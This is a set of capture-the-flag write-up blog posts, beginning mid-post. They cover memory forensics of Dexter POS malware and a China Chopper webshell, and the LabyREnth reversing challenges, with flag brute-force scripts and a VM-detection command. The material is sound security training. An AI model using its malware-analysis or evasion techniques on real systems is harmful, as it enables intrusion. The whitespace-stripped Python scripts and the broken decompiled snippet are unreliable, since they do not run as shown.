For this next question we moved onto something pseudo new to most IR analysts which is a POS system. The first question was what is the CNC of the malware that we didn't even know was running on the system. Where to start here??? The question asked about a connection so that's where I began my hunt. There must be an outbound connection from the host to something so a quick NETSCAN plugin output showed me there were a few outbound connections. 


Seeing there were only a few processes that had an outbound connection I listed those PIDs & IPs to start to track down what the culprit was. The first seen outbound connection was 10.1.1.3 with several connections associated with Outlook.exe. At first glance I moved past this one as it appeared to be an internal exchange server, but I could have been wrong. The next thing in my plan was to see if there were any injected code in the processes I saw with network connections using the MALFIND plugin. 



After running the MALFIND plugin the only networked connection was the PID 3208.  Looking at the output for this process we see an MZ header which is an indication that the process might be injected into. In order to test this theory out I ran the same command specifying the port & a -D to dump out any process we find.


What did it dump out? 


Very nice... Let's see what's in this thing. I submitted the hash of the executable to VirusTotal & what returned as a Dexter variant of POS malware. I felt pretty confident that this was the process's network connection was the communicating to the C2 server. 


Answer: 54.84.237.92


Question #23


This one was a bit tricky again because of the naming but once I submitted the hash to VirusTotal (See below image) there were really only a couple of options to go with. I tried "SYd!fg" unsuccessfully then tried Dexter FTW.



Answer: Dexter

Question #24



Luckily for this question during my search for the identification of the Dexter malware I found an interesting article from the Volatility blog that dealt precisely with this particular malware.
http://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html

 After following the steps shown in the blog I had two very similar DLLs. Looking at the blog and its references I knew that the malware enumerating processes and was comparing them against a list, which was conveniently located at the beginning of the strings. There was one oddity in the blogs version of the strings & the strings I created that was very specific to the Allsafe CyberSec company.





Answer: allsafe_protector.exe

Question #25


In this question the creators wanted you to track back the attack to the initial infection vector. In order to do that I needed to create a timeliner, in hopes to find what happened just before these connections were made. I ran the necessary commands found on the Volatility cheat sheet to create the timeline, and searched for the IP connection that I new had occurred. Boom... It looked as though I had found a file that had been downloaded from the same malicious IP.


After the file is executed we even see the DLLs get loaded into the malicious PID. Safe to say this appears to be the correct file. allsafe_update.exe .




Answer: allsafe_update.exe

[Ed. Note: Using what artifacts I had, I went another route and found the initial executable allsafe_update sitting in Temporary Internet Files. I removed the IE [1] to get the answer:
pos_filescan.txt:0x000000003e7ab038      8      0 -W-rwd \Device\HarddiskVolume2\Users\pos\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\NEQ2CLDX\allsafe_update[1].exe]

Question #26


At last I had reached the final memory image, which was an Exchange Server & the question was what was the filename used by the attackers to control the server. I'm sure me & everyone else who were using a limited resourced VM felt the pain of this 9GB memory image. It felt as though a generation had passed by the time any of my commands were completed. Anyway back to the task at hand... I knew it was an Exchange server and no idea where the compromise might have happened. I knew they were trying to control the server so the first thing I did was run the Netscan command to see if any open connections would get me anywhere.

BOOM... The only external IP was an IP we had seen in the previously in the challenge being used maliciously. That's a start. Not much to go off of because it looks like the PID was System.

So first thing I did was  try to stay simple and create/search through strings for the memory dump for the IP. What I found was several pretty interesting POSTs to a file /owa/error1.aspx.




I thought that was pretty interesting to have POSTs to this file so I then searched for just that file in the strings file.


Well now... that's interesting... After seeing this full post I decided to decode this garbage.


After decoding it I saw that this was actually a webshell that is trying to run remote commands on the server. Now I could safely input this file as the answer.

Answer: error1.aspx

Question #27


In the past I've dealt with several Exchange servers with OWA being owned, the base64 encoded variables & variable names that we used in this particular webshell hinted me towards one particular piece of malware, China Chopper. See https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html

Answer: chinachopper

Question #28


This last question was fairly complicated however after decoding the strings I had a starting point. I saw that there was a call to change directories to a "C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\" so I began my search there. I didn't have much luck searching through strings so I ended up running MFTParser to see what all was located in that directory.

I found some interesting files located within this directory including the webshell, an earlier found RAR file, a test file, and th3k3y.txt. The last one seemed interesting to me but I ended up running FILESCAN to see if I could carve out all of these files. The only file I found to be resident in memory was the th3k3y.txt so I carved it out. What I found inside of the file was a single string.

eNpzLypyzs/zyS9LLfYtCspPyi9xzEtxKzZIzkwtqVRUVAQAybULlw==

I put it in and sadly... the journey was over...

Running the Labyrenth: Unit 42 CTF

$
0
0
At least once a year I try to publish my work process for a Capture The Flag (CTF) event. If you're not familiar with CTFs, they're a timed challenge of very difficult or obscure challenges to gain a "flag" to submit for points. Some enjoy these, some feel them a waste of time. At the very least, they're exercises to keep your mind sharp and your skills prepared for the unexpected.

This year, Palo Alto Networks (notably their threat research team Unit 42), put together a great CTF that was open to the public for one month. Uniquely, they offered sizable cash prizes to the first person to win each category of challenges and to the top winners overall.

Categories of challenges were separated between: Windows, Unix, Documents, Mobile, Random, and Threat. While some of these are apparent, and Random was a cool assortment of off-the-wall stuff, Threat was unique for being very abstract problems of pattern analysis and writing YARA rules. Overall, nearly 40 challenges that were woven through the narrative of the excellent film starring David Bowie: Labyrinth.

While a small number were able to complete each and every one of these challenges, I was excited to just do a handful, about 32. What I'll provide here are just a few of those where I feel like I did something unique or profoundly stupid to obtain the answer.




Windows Challenge #1


The first challenge is a 32-bit executable named AntiD.exe. That wants a typed-in key and compares it to an encoded value to give a Go/NoGo:



 A quick glance in IDA Pro shows a single subroutine, no strings, no realistic imports, leading one to believe that this is a packed executable. A hex view of the file shows section names of ".ups0" and ".ups1". A little farther down, at the beginning of the first section, is the text "3.08""UPX!":

Offset      0  1  2  3  4  5  6  7   8  9  A  B  C  D  E  F

000003D0   00 00 00 00 00 00 00 00  00 00 00 33 2E 30 38 00              3.08
000003E0   55 50 58 21 0D 09 02 07  1C B5 B1 22 80 D7 23 65   UPX!     µ±"€×#e
000003F0   81 66 00 00 EE 0F 00 00  00 28 00 00 26 00 00 ED    f  î    (  &  í

Obviously, we think this is UPX packing :) However, UPX fails to unpack it.

Now, just from guessing, I was able to solve this issue within five seconds and move on. Others debugged it manually until it unpacked in memory. The "official" method should've been to note the error message: "CantUnpackException: file is modified/hacked/protected; take care!!!" and review the UPX source code. Look for the error message and work backwards from there:

    if (memcmp(isection[0].name,"UPX",3) == 0)
    {
        ...
    }
    if (is_packed && ih.entry < isection[2].vaddr)
    {
        ...
            if (offset >= 0 && find(buf + offset + 1, sizeof(buf) - offset - 1, magic, 7) >= 0)
                x = true;
        } catch (...) {
            //x = true;
        }
        if (x)
            throwCantUnpack("file is modified/hacked/protected; take care!!!");
        else
            throwCantUnpack("file is possibly modified/hacked/protected; take care!");
        return false;   // not reached
    }


Note here that the routine starts with a check to see if the first three bytes of the section name are literally "UPX". If not, start throwing errors. By simply changing "ups" to "UPX", the file can instantly be unpacked for analysis. This is the guessing part that I did in five seconds.



Once you're in the executable, it's a straightforward matter of finding the data and the encoding routine. This routine, below, takes the input values, does math on it, and checks each byte against an encoded set of bytes.



Each byte is XOR by 0x33, added to by 0x44, XOR by 0x55, subtracted by 0x66, and finally XOR again by an incremental value. That last part makes it extremely difficult to reverse the routine, as we'd have to brute force that value. Since the routine is simple, the easiest method is to just brute force from the beginning. We can do this byte-by-byte:


#!/usr/bin/env python
key=(0x8C,0xF1,0x53,0xA3,0x08,0xD7,0xDC,0x48,
0xDB,0x0C,0x3A,0xEE,0x15,0x22,0xC4,0xE5,
0xC9,0xA0,0xA5,0x0C,0xD3,0xDC,0x51,0xC7,
0x39,0xFD,0xD0,0xF8,0x3B,0xE8,0xCC,0x03,
0x06,0x43,0xF7,0xDA,0x7E,0x65,0xAE,0x80)

defcrack(guess):
v2=0
foriinrange(0,len(guess)):
v4=ord(guess[i])^0x33&0xFF
v5=v4+0x44&0xFF
v6=v5^0x55&0xFF
v7=v6-0x66&0xFF
v8=v7^v2&0xFF
ifnotv8==key[i]:
returnFalse
v2+=v8
returnTrue

code="PAN{"
forposinrange(4,len(key)):
forcharinrange(32,127):
tmp=crack(code+chr(char))
iftmp:
code=code+chr(char)
break
print(code)

This will print out the flag:

PAN{C0nf1agul4ti0ns_0n_4_J08_W3LL_D0N3!}

Windows Challenge #4


This challenge gave quite a few people issues, and frustrated me for awhile. This is a GUI application that asks for input and gives a Go/NoGo.



Opening up the file in IDA Pro, we look for DialogFunc(), look for typed input to be read with GetDlgItemText(), and work from there. This routine starts with loading a whole set of encoded values into an array using obscure movdqa routines. It then does some obtuse methods for determining the correct length of the input, 32 bytes:

        v25 = -1;
        do
          ++v25;
        while ( GUESS[v25] );
        if ( v25 >= 32 )

If so, the typed value is parsed to ensure that each byte is either a 1, 2, or 3:

        while ( GUESS[pos2] - 0x31 <= 2 )
        {
          ...
        }


The value is then passed into a validation routine. This routine does something with every two bytes, something I spent too much time trying to understand, before I just skipped it entirely. It's just an initial Go/NoGo on the typed value, so we'll force it to Go each time. Once done, it'll add up each number of the value and create a total sum:

        do
        {
          ++pos;
          sum_of_serial += GUESS[pos] - 0x30;
        } while (pos < guess_len);

From there, we see that each number of the typed value is XOR by the sum_of_serial, and XOR again by the respective byte of the array of encoded values. It doesn't even check the values. If the earlier validation routine is correct, it'll print whatever here, even wrong answers.

So we don't know the valid serial number to pass that earlier routine, we don't want to figure out that earlier routine, and we don't know the valid sum of digits. That latter part we can work out easily, though, by working through the expected flag of "PAN{}"

"P" (0x50) XOR "encoded_byte0" (0x27) = 0x77
That first byte can then be either a 1, 2, or 3. So XOR 0x77 by each:
0x31 (1) XOR 0x77 = 0x46 (70)
0x32 (2) XOR 0x77 = 0x45 (69)
0x33 (3) XOR 0x77 = 0x44 (68)

Our sum is one of those three values. By doing the same down the line ("A" against the second encoded byte, "N" against the third), we see only one sum value working: 0x44 (68). Yay!

Now what? We know the sum, but we still don't know the encoded serial number. All we know is that each value is a 1, 2, or 3. So... guess?

I wrote a program to just guess the byte for each and print to an array. From there, pick out the values that make sense.


#!/usr/bin/env python
"""
000000000025EEB0 27 00 00 00 34 00 00 00 38 00 00 00 0E 00 00 00 '...4...8.......
000000000025EEC0 36 00 00 00 47 00 00 00 19 00 00 00 11 00 00 00 6...G...........
000000000025EED0 07 00 00 00 43 00 00 00 40 00 00 00 03 00 00 00 ....C...@.......
000000000025EEE0 1A 00 00 00 14 00 00 00 23 00 00 00 47 00 00 00 ........#...G...
000000000025EEF0 1A 00 00 00 19 00 00 00 04 00 00 00 29 00 00 00 ............)...
000000000025EF00 17 00 00 00 02 00 00 00 13 00 00 00 12 00 00 00 ................
000000000025EF10 0F 00 00 00 2A 00 00 00 0E 00 00 00 46 00 00 00 ....*.......F...
000000000025EF20 20 00 00 00 01 00 00 00 44 00 00 00 29 00 00 00 .......D...)...
000000000025EF30 04 00 00 00 1A 00 00 00 1A 00 00 00 03 00 00 00 ................
000000000025EF40 10 00 00 00 13 00 00 00 28 00 00 00 02 00 00 00 ........(.......
000000000025EF50 1D 00 00 00 12 00 00 00 28 00 00 00 04 00 00 00 ........(.......
000000000025EF60 13 00 00 00 41 00 00 00 1B 00 00 00 29 00 00 00 ....A.......)...
000000000025EF70 2A 00 00 00 07 00 00 00 05 00 00 00 39 00 00 00 *...........9...
000000000025EF80 17 00 00 00 3B 00 00 00 44 00 00 00 3B 00 00 00 ....;...D...;...
000000000025EF90 0B 00 00 00 00 00 00 00
"""
keys=(0x27,0x34,0x38,0x0E,0x36,0x47,0x19,0x11,
0x07,0x43,0x40,0x03,0x1A,0x14,0x23,0x47,
0x1A,0x19,0x04,0x29,0x17,0x02,0x13,0x12,
0x0F,0x2A,0x0E,0x46,0x20,0x01,0x44,0x29,
0x04,0x1A,0x1A,0x03,0x10,0x13,0x28,0x02,
0x1D,0x12,0x28,0x04,0x13,0x41,0x1B,0x29,
0x2A,0x07,0x05,0x39,0x17,0x3B,0x44,0x3B,
0x0B)

sum_value=0x44
result1=list()
result2=list()
result3=list()
print('\n'+hex(sum_value)+''+'='*50)
foriinkeys:
result1.append(i^sum_value^(0x31))
result2.append(i^sum_value^(0x32))
result3.append(i^sum_value^(0x33))

print'1',
foriinresult1:printchr(i),
print'\n2',
foriinresult2:printchr(i),
print'\n3',
foriinresult3:printchr(i),

This resulted in:

1 RAM{C2ldr65voaV2olq\bwfgz_{3Ut1\qoovef]whg]qf4n\_rpLbN1N~
2 QBNx@1ogq56ulbU1lor_atedy\x0Vw2_rllufe^tkd^re7m_\qsOaM2M}
3 PCOyA0nfp47tmcT0mns^`udex]y1Wv3^smmtgd_uje_sd6l^]prN`L3L|

By process of elimination, we can start throwing out invalid characters, keep in spaces ("_") where appropriate, and try to piece out words. That's right, it's time to play!





 After ten minutes, my first attempt worked awesome:

 AM{C2ldr65voaV2olq bwfgz_ 3Ut1 qoovef whg qf4n\_rpLbN1N 
  N @1ogq56ulbU1lor_atedy x0Vw2_rllufe tkd re7m_\qsOaM2M}
P   A0nfp47tmcT0mns  udex y1Wv3 smmtgd_uje_sd6l ]prN`L3L 

PAN{C0ngr47ulaT1ons_buddy_y0Uv3_rooted_the_se4m__pr0aN3L}
312113321332213213321332213213322113133213332122


Congratulations buddy you've rooted the seam .. proanel?



Something's not quite right. Then you realize that the serial is shorter than the flag; it'll reiterate over it. The first part is obvious, so all we need is the first 32 bytes of the serial: 31211332133221321332133221321332

Input that, and you get the whole flag.

... I was close ...




Docs Challenge #5


As much as you'd gather from the name, the Docs track was about various document formats. Most centered around obtaining pseudo-encryption buried within a document, reversing it, and getting the decrypted key out. Challenge 5, however, was a bit more fun.


Running the standard oletools suite against the file showed very little of interest. Just a workbook with three sheets:


E:\CTF\PaloAlto\Docs\5\Calc>oledir.py calc.xls
oledir 0.50 - http://decalage.info/python/oletools
OLE directory entries in file calc.xls:
----+------+-------+----------------------+-----+-----+-----+--------+------
id  |Status|Type   |Name                  |Left |Right|Child|1st Sect|Size
----+------+-------+----------------------+-----+-----+-----+--------+------
0   |<Used>|Root   |Root Entry            |-    |-    |2    |4C      |12096
1   |<Used>|Stream |Workbook              |18   |-    |-    |2       |36567
2   |<Used>|Storage|_VBA_PROJECT_CUR      |1    |16   |14   |0       |0
3   |<Used>|Storage|VBA                   |-    |-    |7    |0       |0
4   |<Used>|Stream |dir                   |-    |-    |-    |0       |551
5   |<Used>|Stream |Sheet1                |4    |6    |-    |9       |991
6   |<Used>|Stream |Sheet2                |-    |-    |-    |19      |991
7   |<Used>|Stream |Sheet3                |5    |9    |-    |29      |991
8   |<Used>|Stream |__SRP_0               |-    |-    |-    |39      |1677
9   |<Used>|Stream |__SRP_1               |8    |11   |-    |54      |198
10  |<Used>|Stream |__SRP_2               |-    |-    |-    |58      |762
11  |<Used>|Stream |__SRP_3               |10   |12   |-    |64      |156
12  |<Used>|Stream |ThisWorkbook          |-    |13   |-    |67      |1408
13  |<Used>|Stream |_VBA_PROJECT          |-    |-    |-    |7D      |2682
14  |<Used>|Stream |PROJECT               |3    |15   |-    |A7      |545
15  |<Used>|Stream |PROJECTwm             |-    |-    |-    |B0      |104
16  |<Used>|Stream |\x05SummaryInformation|-    |17   |-    |B2      |224
17  |<Used>|Stream |\x05DocumentSummaryInf|-    |-    |-    |B6      |308
    |      |       |ormation              |     |     |     |        |
18  |<Used>|Stream |\x01CompObj           |-    |-    |-    |BB      |107
19  |unused|Empty  |                      |-    |-    |-    |0       |0


Searching for VBA macros showed only one script, as minor as it was:

E:\CTF\PaloAlto\Docs\5\Calc>olevba.py calc.xls --decode
olevba 0.50 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
OLE:M-S-H--- calc.xls
===============================================================================
FILE: calc.xls
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: calc.xls - OLE stream: u'_VBA_PROJECT_CUR/VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub excelulate()
    Application.Quit
End Sub


There's really not that much here from a static perspective. Opening it up shows three sheets: two blank and one with a simple flag verifier:



I then spent hours poking at this document, which eventually leads into throwing random tools at it, which eventually leads to just randomly clicking around Excel. This leads to the discovery of a hidden sheet named "secret". While this page looks blank, it contains various fields with Excel formulas with white-on-white text. Changing this shows a formula-based "script" that prompts the document to open an incrementing number of calculators for each failed attempt:



Well, there's still no flag functionality. There's also a reference to a cell of "supersecret!F13". If there's one hidden page, what about another? Using VBE, we can iterate through the sheets and make them visible:




Upon doing so, another sheet appears: supersecret

This sheet contains our sought after character decoding routines, strewn about in various cells:



Each of these fields has a long stretch of text and a four-letter 'key'. The position of that key, as an ASCII char, is the decoded byte. The final cell, F13, takes the concatenation of all these characters and compares them to the input text field on the first sheet. First off, let's see what these fields actually show by turning off formulas:



Well, there's our flag spread about. We could try to work with the formula to reverse the key:

=RETURN(EXACT(CONCATENATE(D7,A5,C5,B4,E20,B6,A8,B8,A12,B10,E10,C9,B13,D12,C11,B16,A25,A18,B19,C20,B21,B2,D23,B24,E4,B26,D16,A21,C14,A16),Sheet1!B3))

However, it's just as easy to modify it. Remove the "RETURN" and "EXACT" operands and you're left with a single CONCATENATE that shows the flag:



Bit Bucket


There are a few other cool stuff I'll just call out with little context:


Windows Challenge #8

This challenge was a Windows device driver that was my nemesis. Mostly because I tried for too long to dynamically solve it and, in a drunken state, installed WinDbg on my Windows 10 host. This caused numerous memory issues, crashed VMWare every time it started, and left me spending two days trying to restore my system back to normal. Then another two weeks trying to figure out why hitting Prt Scrn would instantly freeze my system (it was due to the debugger).

It had a number of great messages, including the flag!




Unix Challenge #3

This was one of those weird challenges that was solved within minutes, only because that morning a coworker had sent a link to a cool obfuscation method which I thought would be great for a CTF. And here it was. REpsych.

REpsych is a cool tool that creates an executable where the graph view in IDA Pro creates a message. The limitation here is that it will only work in IDA Pro, which is kind of a cheap shot for some. At least you can use the free IDA to get it.

Others found a trace to "repsych.asm" in the file, which was the major clue. I found it by working through the error messages:



Seeing that, I kept expanding the upper limit in IDA to show more nodes.



Once reached, the answer popped out:



Unix Challenge #6

In this challenge you were given a client and server app compiled in Go. One issue that others noted afterward was that IDA refused to decompile it because of the unknown type sizes with Go:


For an unknown reason, this is resolved by setting the size of Int from 8 to 4. I don't know why, but blind guessing through the values made it work.



Windows Challenge #7

In this challenge you were given a program that reads the contents of an arbitrary "file.txt", encrypts it, and transmits it over the network. You receive the program and the PCAP and told to determine the flag that was transmitted. This one was fairly straight forward. After retrieving each byte out per frame, the flag was Base64 encoded with a custom alphabet, and then run through an encryption routine:

  v13 = 0xBADA55;
  delta = 0x9E3769B9;
  v12 = 0x4913092;
  v11 = 0x12345678;
  v10 = 0xDEADBEEF;
  v8 = *data;
  v7 = *(data + 4);
  sum = 0;
  for ( i = 0; i < num_rounds; ++i )
  {
    v8 += (*(key[sum & 3]) + sum) ^ (v7 + ((v7 >> 5) ^ 16 * v7));
    v13 += 4092;
    for ( j = 8; j < 32; ++j )
    {
      v11 *= 8;
      v13 -= 64;
      v12 -= 8;
    }
    v10 = 64;
    sum += delta + 0x1000;
    v7 += (*(key[sum >> 11] & 3)) + sum) ^ (v8 + ((v8 >> 5) ^ 16 * v8));
  }


As with any unique encryption routines, focus on the hardcoded seed values. However, these show up with very few results. The value of 0x9E3769B9 refers to a thread on the Rune Server forum where there's a discussion of modifying an encryption routine to allow unique clients. If you take that function name (method248()) and search for the rest of the reversed Rune Server source code, you find that this is eXtended Tiny Encryption Algorithm (XTEA) with the value changed from the standard 0x9E3779B9.

Now that we know it's what appears to be a custom XTEA encryption**
** Update: As my good friend Dan Dash pointed out, the seed of 0x9E3769B9 is 0x1000 short of the expected delta, which is added back in at the bottom. This is standard XTEA with just a small change so keep automated tools from seeing it.

Overall, great fun and a great set of challenges by Palo Alto Networks Unit 42! Thanks!

And to David Bowie:



Exploring the Labyrenth (2017 Edition)

$
0
0
2017 brings us one of the best, though newest, CTFs: Palo Alto's LabyREnth.The 2016 iteration was a grueling set of 3 dozen challenges across multiple topics that tested one's ability, skill, patience, and endurance.

2017's challenge one-upped the previous by having a fully explorable, rogue-style text world in which one could explore to find challenges. Not to the level of ROM MUD or ZZT, two of my largest time sinks when I was young, but to a fun level where one could explore, see the sights, and have a humourous romp through a landscape influenced from David Bowie's film masterpiece, Labyrinth.




There are certain sections that are locked off by challenges; progression is only possible through successful completion of challenges. I was happy to get a pretty large chunk mapped out, though:


Each successful challenge also granted additional equipment to assist in combating the final boss. In a virtual sense; you can't fight him until you beat all other challenges anyhow. But, it was fun to track the equipment being given:



With that, on to the challenges. There were six categories of challenges again this year: Binary, Docs, Threat, Programming, and Mobile. There was also the Random category where challenges were sprinkled around the world and hidden behind riddles (highlighted in orange in the map above).

My goal for the year was to complete one entire track (Binary) and to get at least one challenge in each other category. With that, here were some interesting ones I ran into.

Mobile 2 - MIPS


Hint: RouterLocker is free encryption software for securing your router. Thank you, in advance, for purchasing RouterLocker.
Author(s): int0x80

I had some upfront warning that this challenge was coming from int 0x80 and I made sure that I got to it during competition. MIPS is completely unknown to me, let alone how to analyze, debug, or even make it work. And I had less than two days open on my schedule to get it done. This was going to be an uphill climb.

routerlocker: ELF 32-bit MSB executable, MIPS, MIPS64 version 1, dynamically linked (uses shared libs), for GNU/Linux 2.6.26, with unknown capability 0x41000000 = 0xf676e75, with unknown capability 0x10000 = 0x70401, not stripped

This challenge began with static analysis using IDA Pro, and opening every manual I could find on MIPS programming to understand what I'd be looking at.

As a first step, looking for resolved strings was slightly unfruitful. The strings shown were for output messages, but none for actual program functionality, as shown below. Where the file attempts to look for a filename, and the reference to that action shown in the strings, there were no strings to suggest a filename.



Going off the clue of it looking for a file, we look for any file reading function calls and see fopen() being used.


Wow, what a right mess. After a calling to ptrace(), we see a big chunk of data being constructed to be passed into fopen(). This is our file name, which is a stack string with irregular offsets. Converting the hex to strings, below, and putting the pieces together in a hex editor shows the filename is /tmp/router.lck. We also proved this later in dynamic analysis.



Further analysis to show the operations that would lead to a successful end show that the data from this file is read, processed in some mathematical way in sequence, and then used to verify a correct pass. This routine, with some of my basic notes, is shown below. However, from a static standpoint we can identify some weaknesses in this routine. For one, there is no block or string-based comparison. Instead, each byte is checked one-by-one with an exit clause if any single byte fails. So all we need to do is figure out each byte in order, not a full set of bytes.



Immediately before this algorithm is another set of data being constructed into an array in variable order, which is likely our "pad" for decrypting the data in the file:



One could do this entire challenge statically using this data and working backwards through the routine. But, I'd like to learn how to do this dynamically to learn how these files are run. And that would require a MIPS environment to run in. This was not easily done, but after hours of scouring websites and write-ups, I was able to find effective methods to create the environment and execute the challenge.

The initial step was to install QEMU and find a MIPS image. A proper Debian compiled version was located on Debian servers. Using the Wheezy hard drive image (qcow) and vmlinux-3.2.0-4-5kc-malta, I followed the steps by Aurélien Jarno to make a functional VM. Once booted, I lacked copy/paste abilities, so I just uploaded the routerlocker challenge to my website and downloaded into the VM. Running it gave the expected output of failure: "License file not found." and "Lock it up, and lock it out."

First step was to install and run strace to track execution. strace by itself gave no usable output, not even the file being read, but running it in File Open and File Access mode showed what I needed:



For much of the remainder, I'll apologize in advance. I had never used gdb before and so I spent a few hours that Sunday night learning how, and tripping over myself in mistakes. I was also working in a VM with an _incredibly_ slow screen write rate (half a second per line of text) and no copy-paste. I'll try to transcribe and show steps here, but most items will be shown as screenshots.

After learning the entry point below, I set additional breakpoints of where I should be based upon static analysis:

(gdb) info files

Symbols from "/root/routerlocker"

Local exec file:

'/root/routerlocker', file type elf32-tradbigmips.
Entry point: 0x400780
0x00400154 - 0x00400161 is .interp
.... Removed for brevity ...
0x00411130 - 0x00411150 is .bss

(gdb) break *0x400780
Breakpoint 1 at 0x400780
(gdb) break *0x400b1c (start of parsing data)
Breakpoint 2 at 0x400b1c
(gdb) break *0x400d18 (read data strlen)
Breakpoint 3 at 0x400d18
(gdb) r (run program)
Starting program: /root/routerlocker

Breakpoint 1, 0x00400780 in _ftext ()
(gdb) c (continue execution)
Continuing.
License file not found.
Lock it up, and lock it out.
[Inferior 1 (process 2578) exited normally]


WTF? It hit my first bp and didn't even touch the latter two. As it turns out, there's a reason for that. Immediately after starting, the challenge runs fork() to split itself between two processes. More research showed that gdb was following the master set of execution and not the spawned child process. This is easily solved by setting "set follow-fork-mode child" and re-running the program. Doing so yielded my second breakpoint!

Breakpoint 1, 0x00400780 in _ftext ()
(gdb) c
Continuing.
[New process 2610]
[Switching to process 2610]

Breakpoint 2, 0x00400b1c in main ()


OK, now we're set to start attacking the routine. We'll need to seed the router.lck file with data that we can trace to see how it's manipulated. The first step is to determine how big our data should be. This is actually shown up front as the program reads in 29 bytes from the file:



I seeded my data with PAN{1234567890abcdefghijklmnop}, then made sure I could find that in memory once run. Using 'i r' to display registers, I found the data being read into a pointer from v0. Using 'x' to display the first DWORD I was 0x40314e7b ("PAN{"), then used 'x/16' to display 16 sets of DWORDs to view the rest:


Awesome, data is in place, now let's get back to our math. It's a somewhat straight forward routine, just hindered by the language and difficulty in getting dynamic analysis to work. It also has a great weakness that can be exploited. For each byte, it will take the respective byte of the pad, perform this routine which ends in an XOR, and then compares it to a check-value. That check-value never changes, so we can exploit XOR.



As many know, XOR works in deltas. A ^ B == C. A ^ C == B. C ^ B == A. If you know any two values you can determine the third. And so you can use this to your advantage. In here we know the respective "pad" value, and the check byte. Regardless of what math occurs up until the end, we can solve for the correct byte at the very last operation by XOR'ing the pad byte against the check byte.

And so, by tracing along the code, I found that at the end it XOR's the router.lck byte against the respective pad byte and compares it to the respective check byte. So, for each byte, just XOR the pad byte by the check byte and you'll get the original data. Then, set the check byte correctly so that it'll wrap around to the next byte. So, set a breakpoint at that part, step to the comparison operation, and display the registers of v0 and v1.

Particularly, break at 0x400c5c, step (stepi), display v1 (i r v1), to get the pad byte.  Set a breakpoint at 0x400c78 and step forward to display the data byte (a0), pad byte (v0), and check byte (v1). XOR v0 by v1 in a calculator to get the original data byte. Then set v0 to v1 so that it'll pass the check and continue (c) forward


Once all was determined, and I was able to step through and determine the first few bytes of the data, I decided to just go and do them all. It was only 29 of them.  When all was done, I had my key. Actually, I was able to stop early and guess the end part, with the whole thing being:

that_ransomware_ran_somewhere

This was a fun challenge that I learned a lot from.

Binary 4 - Mac Ransomware


This challenge was fairly straight forward, but did have a few notable and funny components to discuss. Once downloaded, the challenge contained a 64-bit Mach-O executable and a binary file named PANW_Top_Secret_Sauce.jpg.encrypted.

The challenge is fairly straight forward. The binary will acquire the MAC address of the system and use it as a key to RC4 encrypt a file named PANW_Top_Secret_Sauce.jpg. A unique computer identifier is generated to send to the "ransomware" developers.

I executed this challenge using Hopper, a tool I don't recommend, but was chosen out of laziness. This challenge could also be performed using the IDA Pro debugger with the Mac remote debugger, which is a preferable method.

One unusual issue is that the sample attempts to detect if it is running within a VM by running a standard ioreg command:

ioreg -l | grep -e Manufacturer -e 'Vendor Name' | grep -e 'Parallels' -e VMware -e Fusion -e 'Virtual Box'

This command will display all I/O devices with the words 'Parallels', 'VMware', 'Fusion', or 'Virtual Box' in the vendor name field. However, there appears to be a bug in the way the challenge was developed. If executed from under a typical user in a VM, it _should_ catch this and fail. However, if executed under another application, like Hopper, there is no PATH set to find ioreg. The execution will 'fail open' and the program will proceed regardless of being in a VM or not.



For this check to work completely, it must be set absolutely as /usr/sbin/ioreg. Once that's done, it executes correctly and returns back the value to say it's running in a VM:



After this basic check, the MAC address of the system is used to perform the encryption using RC4. This is done through a standard, easily recognizable RC4 algorithm implemented statically. This same MAC address is then used to generate a unique identifier through an algorithm below:


This routine takes the values of a static lookup table, below, and generates a 5-byte output based upon the first five bytes of the MAC address.


Now, how do we attack this? We can't go backwards from the resulting file, so we'll have to brute force various MAC addresses until we find the correct one.

Brute forcing based upon a 6-byte value would take an extremely long time. With only the first five in play, I assumed this would be an obvious tell to help lower the key space due to this length. So, I launched a brute force script and, after 12 hours, barely made a dent into the keyspace. Ouch. This wasn't going to work.

I stopped for awhile and went onto other challenges, but came back after poking around the World Map and finally realized the hint:


Hint: Send me this identifier together with your $$$$ to decrypt your file: da91e949f4c2e814f811fbadb3c195b8

Whoa. That's the identifier. I don't need to brute force the JPG, I just need to brute force the ID routine to find a value that matches that hash. I turn my brute forcer to that, came back 12 hours later, and realized I still wasn't getting enough performance to finish this quickly.

I thought of ways to shorten this and realized I could just download a master database of all MAC address Organizationally Unique Identifier (OUI). It's still a hefty list of 10s of thousands, so I removed the virtual machine ones to lessen the keyspace, since we know the sample won't run in those environments:



importcodecs
importhashlib

lookup='\x13\x9A\x1B\xE4\xF3\x8E\xC7\x8C\x3F\x7A\xDC\x0B\x42\xA7\xF8\x6E\x9F\x08\x79\x17\xD6\xB1\x33\x7D\x67\x01\x1C\x1C\x1C\x02\x30\x0A\x34\x34\x22\x1B\x34\x03\x0C\x02\x14\x02\x01\xC0\x01\x01\x21\x02\x01\xC8\x22\x01'

defrun_data(mac):
result=[0,0,0,0,0]
done=''
foriinrange(5):
forjinrange(5):
pos=(20*j+4*i)/4
x=lookup[pos]
mult=ord(x)*ord(mac[j])
result[i]+=mult

result[i]=result[i]%0xFB
done+=chr(result[i])+'\x00\x00\x00'

test=hashlib.md5(done).hexdigest()
returntest


defmain():
foroui_addrinopen('oui.txt','r').readlines():
ifnot'(hex)'inoui_addr:
continue
oui_addr=oui_addr.split()[0]
oui_addr=oui_addr.strip().replace('-','')
oui_addr=codecs.decode(oui_addr,'hex_codec')
print('[*] OUI: {}0000'.format(codecs.encode(oui_addr,'hex_codec'))),
forainrange(256):
forbinrange(256):
test=oui_addr+chr(a)+chr(b)
result=run_data(test)
ifresult=='da91e949f4c2e814f811fbadb3c195b8':
print(result)
print(test,codecs.encode(test,'hex_codec'))
quit()
print('-- {}'.format(codecs.encode(test,'hex_codec')))

if__name__=='__main__':
main()


However, after hours of running, I still got nothing. In fact, it ran through everything with no positive results. Frustrated, I went back to my large-scale brute force which was estimated to take days. I wrote off hate mail to the organizers and went back to other challenges.

It bugged me, though. So, I started throwing everything at it. I then found the answer accidentally. I ran the brute force checker against the master database of OUIs instead of my filtered list, and the answer eventually popped up:


